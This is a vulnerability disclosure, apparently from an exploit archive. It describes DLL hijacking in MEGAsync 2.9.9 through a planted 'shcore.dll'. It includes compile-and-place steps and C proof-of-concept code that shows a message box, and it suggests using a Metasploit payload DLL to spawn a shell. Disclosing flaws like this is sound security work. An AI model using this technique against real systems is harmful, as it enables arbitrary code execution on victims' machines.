MEGAsync 2.9.9 DLL Hijacking
Posted on 30 August 2016
# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll) # Date: 27-8-2016 # Author: Amir.ght # Vendor Homepage: https://mega.nz # Software Link: https://mega.nz/MEGAsyncSetup.exe # Version: 2.9.9 # Tested on:Windows 7 ---------------------------------------------------------------------------------------------------------- Vuln DLL: shcore.dll MEGAsync.exe will search for an load any DLL named "shcore.dll". If an attacker can place the DLL in a location where victim open MEGAsync.exe it will load and run the attackers DLL and code. also can generate a msfpayload DLL and spawn a shell, for example. ---------------------------------------------------------------------------------------------------------- # Exploit: 1- Save and compile below C code as 'shcore.dll' to create vuln DLL 2- Place 'shcore.dll' on Same Directory of MEGAsync 3- Open MEGAsync.exe :DLL //gcc test.c -o shcore.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; }